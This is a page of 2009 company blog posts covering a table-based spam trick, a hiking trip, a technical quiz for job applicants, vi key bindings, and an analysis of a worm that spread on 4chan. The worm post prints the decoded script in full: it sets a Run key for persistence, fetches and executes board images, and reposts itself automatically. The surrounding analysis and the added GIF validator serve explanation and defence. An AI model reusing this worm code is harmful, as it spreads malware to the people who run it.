Monday, March 23, 2009

Look ma! Tables!

Sorry for the rarity of updates, my head (and days) have been so full of the last pre-release issues lately that I can't find the time to post about anything worthy -- including, for example, the epic fight with the JVM that fails mysteriously every now and then if it cannot find /proc where it expects it, and fails just the same, but for a totally different reason and on each and every run, if it can. (Kudos to the tireless tester of ours who kept trying out different versions of Java until he found one that produced a never before seen error message that yielded one single Google hit that brought us to the solution.)

However, this is something worth mentioning. I mean, we've seen all kinds of spam that desperately tries to get past the ever-growing wall of Bayesian filters. Deliberate misspellings, images that get filtered, adding whole paragraphs of bogus sentences -- we've seen them all. But using a colored HTML table to get the name of the Blue Pill onto our screens: wow, that's clever.

This is what landed in my mailbox today:

And here's the HTML that Blogger seems to mess up badly:

Do we have to start writing OCR for HTML tables?
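Half an answer to that question, as an added example that is not from the post: a small Python rasterizer that turns a "table picture" into an ASCII bitmap a filter can look at (or hand to real OCR). The HTML below is a constructed stand-in for the spam, a 5x5 grid of tiny cells whose background colours draw the letter V; the spam's own markup is not reproduced here.

```python
from html.parser import HTMLParser

INK, PAPER = "#0000ff", "#ffffff"
LETTER_V = ["#...#", "#...#", "#...#", ".#.#.", "..#.."]   # constructed sample

def _cell(ch):
    color = INK if ch == "#" else PAPER
    return f'<td bgcolor="{color}" width=2 height=2></td>'

SAMPLE_HTML = "<table cellpadding=0 cellspacing=0>" + "".join(
    "<tr>" + "".join(_cell(ch) for ch in row) + "</tr>" for row in LETTER_V
) + "</table>"

def bgcolor_from_style(style):
    """Pull a colour out of inline CSS (background / background-color)."""
    for decl in style.split(";"):
        prop, _, value = decl.partition(":")
        if prop.strip().lower() in ("background", "background-color"):
            return value.strip()
    return None

class TableRasterizer(HTMLParser):
    """Records the background colour of every <td>/<th>, row by row."""
    def __init__(self):
        super().__init__()
        self.rows = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "tr":
            self.rows.append([])
        elif tag in ("td", "th") and self.rows:
            self.rows[-1].append(a.get("bgcolor") or bgcolor_from_style(a.get("style", "")))

def is_ink(color):
    """A cell is 'ink' when its #rrggbb colour is clearly darker than white."""
    if not color or not color.startswith("#") or len(color) != 7:
        return False
    r, g, b = (int(color[i:i + 2], 16) for i in (1, 3, 5))
    return (r + g + b) / 3 < 200

def rasterize(html):
    """ASCII bitmap of the table: '#' for coloured cells, '.' for the rest."""
    parser = TableRasterizer()
    parser.feed(html)
    return ["".join("#" if is_ink(c) else "." for c in row) for row in parser.rows]

def ink_ratio(html):
    """Share of coloured cells; many tiny cells with a moderate ratio smells like a picture."""
    grid = rasterize(html)
    cells = sum(len(row) for row in grid)
    return sum(row.count("#") for row in grid) / cells if cells else 0.0
```

Printing `"\n".join(rasterize(SAMPLE_HTML))` shows the V that the Bayesian filter never sees in the tag soup.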

Monday, March 16, 2009

Geeks in Nature

Yesterday I went out for a hike with some old friends to enjoy the weather that has finally got warm enough to go out, and to get away from the rush of the soon-to-be-ready SSB 1.0.2 release for a day. Nothing too serious, only ~15 km in the hills near Buda with some pretty steep slopes to climb.


Five guys, three girls, light showers, thick mud, hiking boots, backpacks, the beautiful forest, sandwiches, flasks of water, some home-produced wine from a friend's vineyard -- seems like nice old-school outdoorsman stuff, a great day away from computer screens and networks, right? Well, here's how it actually looked:

  • the invitation to the trip was sent out in a blog post
  • we RSVP'd on Doodle
  • we arranged the last-minute details using IM, without even knowing exactly which protocols were used, as most of us tend to use clients that aggregate 4-5 different IM accounts
  • the timetable for all the buses and trams we had to use was fetched on-the-spot from the website of Budapest Transport with our phones
  • on the long bus trip, one of the guys entertained us by scoring us on a funny quiz from a news website
  • until we got out of urban areas, we used GPS and Google Maps for navigation, only then did we switch to a proper, printed hiker's map
  • when we ran out of online map coverage ("Well, we're this little balloon in the middle of...green stuff."), one of the guys bought and downloaded a GPS-based compass application from Apple's App Store to his iPhone, only to realize that he would need to go straight ahead in one direction for at least 100 meters at at least 5 km/h to let it initialize itself, which is quite hard to do on a curvy hiking path
  • we kept teasing one of the guys about the problems in Google Maps -- as he'll start working at Google in two weeks. (And who, as a strange coincidence, happened to write at least one of the proxies in Zorp here at BalaBit lots of years ago, although we've never worked together here.)
  • we had a long and nice talk with a friend during the trip -- about SAP and motivational and rating systems they have at their company.
  • one of the guys kept emailing a customer about a custom-made software he had a problem with throughout the whole day
  • the first blog post about the trip with geotagged photos appeared approx. 30 minutes after we got home
Next time we seriously need to get out of 3G coverage.

Saturday, March 7, 2009

BalaBit Quiz

A couple of weeks ago I spent an afternoon along with our HR manager, Veronika, at Eötvös Loránd University: we had a booth there at an event where companies offering internship programmes could show the students what they do and why they should choose them. It's good to be there: we first met the majority of the XCB team and a lot of our testers through this so-called "Cooperative Education" programme.

We wanted to find a way to test the level of knowledge of the people interested in working with us that is quick, not too tedious and even a little bit fun, so our SCB and SSB product architect, Marci, put together a quick quiz and we offered BalaBit-branded T-shirts and mugs for high scores. It turned out to be a big success: most of the students enjoyed thinking about the questions, and some friends I shared it with all said that it's indeed a quite entertaining questionnaire for IT people. So I thought it might be worth showing it here as well -- here comes a rough translation of the original set of questions:

Which is the odd-one-out?

A, ICA
B, RDP
C, VNC
D, RPC

Which is the odd-one-out?

A, 3DES
B, RSA
C, AES
D, RC5

What does CIA stand for?

A, Complex IT Audit
B, Confidentiality, Integrity, Availability
C, Certified IT Auditor
D, Central Intelligence Agency

Which is the odd-one-out?

A, GCC
B, GDB
C, GPL
D, GIT

Which command cannot be used to display the routing table in Linux?

A, route
B, ip
C, netstat
D, ifconfig

Which does not make any sense at all?

A, to strace tcpdump?
B, to tcpdump strace?
C, to attach to strace with GDB?
D, to strace GDB?

How many messages can syslog-ng, running on a current average computer, receive in a second?

A, 700
B, 7000
C, 70000
D, 700000

What's the broadcast address for the 10.20.30.32/18 network?

A, 10.20.30.255
B, 10.20.31.255
C, 10.20.63.255
D, 10.20.255.255

Why does the TCP header have a header-length field while UDP does not?

A, As TCP is a connection-oriented protocol it's necessary to know the exact length of the header.
B, The length of a UDP header is fixed.
C, TCP doesn't have a mandatory header-length field, it can be used as an option.
D, This is a design error in UDP, this is why it cannot be considered a reliable data transfer protocol.

What's PMTU?

A, the value of the primary MTU on a given interface
B, the maximal packet size on a path
C, a way to flood the network
D, one of the flags in an IP packet

Which of the following can be used to process XML documents?

A, XML-SCHEMA
B, XSLT
C, DTD
D, all of the above

What does it print?

#include <stdio.h>

int main(void)
{
    char str[9] = "abcdefgh";
    char *p[2];
    char **pp;

    p[0] = str;
    p[1] = str + 4;
    pp = p;

    printf("%c\n", *(++(*(++pp))));
    return 0;
}

A, b
B, d
C, f
D, Nothing, it won't even compile.

On X86_64 architecture under Linux which structure is the smallest in size?

typedef struct a
{
void *a;
char c;
int b;
} aa;

typedef struct b
{
int b;
void *a;
char c;
} bb;

typedef struct c
{
int b;
void *a;
char c;
} cc;

typedef struct d
{
char c;
void *a;
int b;
} dd;

How many of the people working at BalaBit know how to compile a kernel?

A, 70%
B, 80%
C, 90%
D, 100%

Select the text between the brackets to see the answers:
( D, B, B or D, C, D, B, C, C, B, B, B, C, A (the first one), B )

Oh, and if you scored above 10, drop a mail to cv@balabit.com. We're hiring.
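For the struct-size question above, here is an added worked answer (not part of the original quiz): the four structs declared through Python's ctypes, which applies the platform C compiler's alignment rules, so the padding the compiler inserts becomes visible field by field. The sizes in the comments assume an 8-byte pointer, i.e. x86_64 as the question states.

```python
import ctypes

# The four structs from the quiz, field order exactly as printed there.
class aa(ctypes.Structure):
    _fields_ = [("a", ctypes.c_void_p), ("c", ctypes.c_char), ("b", ctypes.c_int)]

class bb(ctypes.Structure):
    _fields_ = [("b", ctypes.c_int), ("a", ctypes.c_void_p), ("c", ctypes.c_char)]

class cc(ctypes.Structure):   # identical to bb, as printed in the quiz
    _fields_ = [("b", ctypes.c_int), ("a", ctypes.c_void_p), ("c", ctypes.c_char)]

class dd(ctypes.Structure):
    _fields_ = [("c", ctypes.c_char), ("a", ctypes.c_void_p), ("b", ctypes.c_int)]

STRUCTS = {"aa": aa, "bb": bb, "cc": cc, "dd": dd}

def pointer_size():
    return ctypes.sizeof(ctypes.c_void_p)   # 8 on x86_64 (assumed below)

def layout(struct):
    """(total size, [(field, offset, size), ...]); gaps between entries are padding."""
    fields = [(name, getattr(struct, name).offset, getattr(struct, name).size)
              for name, _ in struct._fields_]
    return ctypes.sizeof(struct), fields

def padding_bytes(struct):
    """Bytes the compiler inserted purely for alignment."""
    size, fields = layout(struct)
    return size - sum(field_size for _, _, field_size in fields)

def smallest():
    """Name of the struct with the smallest sizeof: the quiz's answer."""
    return min(STRUCTS, key=lambda name: ctypes.sizeof(STRUCTS[name]))

if __name__ == "__main__":
    # On x86_64: aa is 16 bytes (3 bytes of padding after the char), the other
    # three are 24 bytes each, because the pointer forces 8-byte alignment
    # both before it and at the end of the struct.
    for name, struct in STRUCTS.items():
        size, fields = layout(struct)
        print(f"{name}: sizeof={size} padding={padding_bytes(struct)} {fields}")
    print("smallest:", smallest())
```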

Friday, March 6, 2009

The power of vi

No survey has ever been made but it's safe to assume that the majority of BalaBit's products are written in vi. There's some joe and nano usage here and there, there's Visual Studio for Windows development and Eclipse is starting to get more and more space, but still, the rock-hard basis for editing code is vi. One of the big changes during the last year in our XCB group was switching to Eclipse from ad-hoc editors -- it wasn't enforced in any way, it just turned out that PDT got so good that it was worth playing around with it long enough to fit it into our development environment. But for lots of tasks, like debugging on a live appliance or during code integration, vi is still extensively used.

It was after such a long day spent browsing through code in vi that I accidentally found out about keystroke commands in Google Reader. I know it's lame, but I never thought it'd have any -- I just pressed "j" instead of the down button just like I had done throughout the day, and it worked. I got curious and found out about all the other commands, and my Feed Reading Experience (TM) just got 100 percent better.

Last evening I was browsing through my 2000+ unread items in GR (hey, it was a busy week and I'm interested in lots of stuff), I got interested in the comments on a Slashdot story and went on to read them (button "v", for the record). It was after spending 10 minutes reading the comments that I realized that I had been moving around with the "j" and "k" buttons. And "h" and "l" work as well. Vi power, everywhere.

So I spent the sleepy beginning of this day, while waiting for my morning coffee to kick in, looking around for places in SCB and SSB where the standard vi "h-j-k-l" commands could be used -- moving around configuration blocks and pages or something like that. Partly as a usability feature, yes. But mainly as a tribute to the best editor out there and as a way to give something to the hardcore nerd users, for whom, like for me, it became second nature to use the keystrokes of vi everywhere.

Monday, March 2, 2009

Anon, you've been infct'd

For those of you who do not know: 4chan is one of the biggest, and especially its sub-site called "/b/" one of the most trafficked, messageboards on the net. But all these tons of people do not create value, do not discuss important (or even unimportant) matters: it's complete and utter nonsense in a totally un-PC and NSFW way. To quote Wikipedia:

Douglas said of the board, "reading /b/ will melt your brain", and cited Encyclopedia Dramatica's definition of /b/ as "the asshole of the Internet". Mattathias Schwartz of The New York Times likened /b/ to "a high-school bathroom stall, or an obscene telephone party line", while Baltimore City Paper wrote that "/b/ is the kid with a collection of butterfly knives and a locker full of porn ... in the high school of the Internet". Wired describes /b/ as notorious.

Sitting down to read /b/ is similar to watching Jerry Springer: you know it'll suck away your IQ and that any respectable person will despise you for it, but anyway, for times when you can't do anything meaningful, it can be pretty much fun.

That fun was ruined a couple of days ago for all those /b/tards (that's what the frequent posters call themselves) for a day, when a virus based partly on some simple Windows scripting, partly on social engineering took over the site -- and that's when it starts to get interesting from the security point of view.

The basic concept of the virus was to get the user to download an image, rename it to 4chan.jse and run it as an executable. The image is a script written for Windows Scripting Host and encoded with Microsoft's script encoder to make the site's upload form accept it as an image. This script then fetches a random image from the messageboard, tries to run it as a script, and if it succeeds, it decides that it's a previously posted instance of itself and reposts it to the site, making the virus spread even more. If the fetched image is not a runnable script, it just tries to fetch another one, in an infinite loop.

As Microsoft's script encoder is just a simple tool to prevent script kiddies from ripping off code used on websites, more an obfuscator than a real encoder, the script could be decoded, and the revealed WScript code is quite interesting. Not because it contains any clever tricks or elegant solutions: only because it's quite rare to see such a simple yet so successful virus that can be understood without any knowledge of the affected system, or hell, even the programming language it was written in. So here it goes in all its glory, the <100 lines of code that stopped Rickrolling for one day:


GIF89aI = "x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");

"‰";
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
"è";
xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
part1.close();

var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

try {
ie.navigate("http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }

It turns out that this was actually the sixth time a similar virus had taken down the site. There have been trickier variations that took pictures from the users' My Documents folder to use them as new containers for the program, and simpler ones that simply posted the script itself along with instructions to copy-paste and save it using Notepad.

Don't even get me started on how many levels the spread of this virus could have been prevented (users not downloading and running unknown things from a site they know gathers the worst kind of crowd, captchas preventing automated posting etc.). One thing is sure: the site's administrators managed to stop the repostings and a day later, business was back to usual. And we got to see yet again how an extremely simple piece of code can bring an entire site down in a matter of hours.
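One of those levels is the upload form, which evidently accepted the file because it began with the six bytes GIF89a (see the first line of the script). As an added example, not code from the post or from the site, here is a Python check that walks the GIF block structure (logical screen descriptor, colour tables, extensions, image descriptors, trailer) and only accepts a file that parses all the way to the trailer; a script with a GIF magic prefix fails in the first block. Both sample inputs are constructed for the demonstration.

```python
import struct

def _skip_subblocks(data, pos):
    """Walk a chain of length-prefixed sub-blocks; return the offset after the
    0x00 terminator, or None if the chain runs off the end of the file."""
    while pos < len(data):
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n
    return None

def is_well_formed_gif(data):
    """True only if the whole file parses as GIF87a/89a block structure,
    not merely if it starts with the six magic bytes."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    _w, _h, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    pos = 13
    if packed & 0x80:                        # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    while pos is not None and pos < len(data):
        block = data[pos]
        if block == 0x3B:                    # trailer: clean end of image
            return True
        if block == 0x21:                    # extension: label, then sub-blocks
            pos = _skip_subblocks(data, pos + 2)
        elif block == 0x2C:                  # image descriptor (10 bytes)
            if pos + 10 > len(data):
                return False
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:               # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos = _skip_subblocks(data, pos + 1)   # +1 skips LZW min code size
        else:
            return False                     # garbage where a block should be
    return False                             # ran out of data before the trailer

# Constructed: a valid 1x1 pixel GIF89a with a 2-entry global colour table.
GOOD_GIF = (b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
            + b"\x21\xf9\x04\x01\x00\x00\x00\x00"
            + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" + b"\x02\x02\x44\x01\x00" + b"\x3b")
# Constructed: script text that merely starts with the GIF magic, the worm's trick.
POLYGLOT = b'GIF89aI = "x1!\xfe\xf7";\nvar x = 1;\n'
```

Sniffing the magic bytes is what the form did; parsing the structure is what a filter has to do before trusting an "image", and a renamed script also still needs a user to run it, so the check is one layer, not the whole answer.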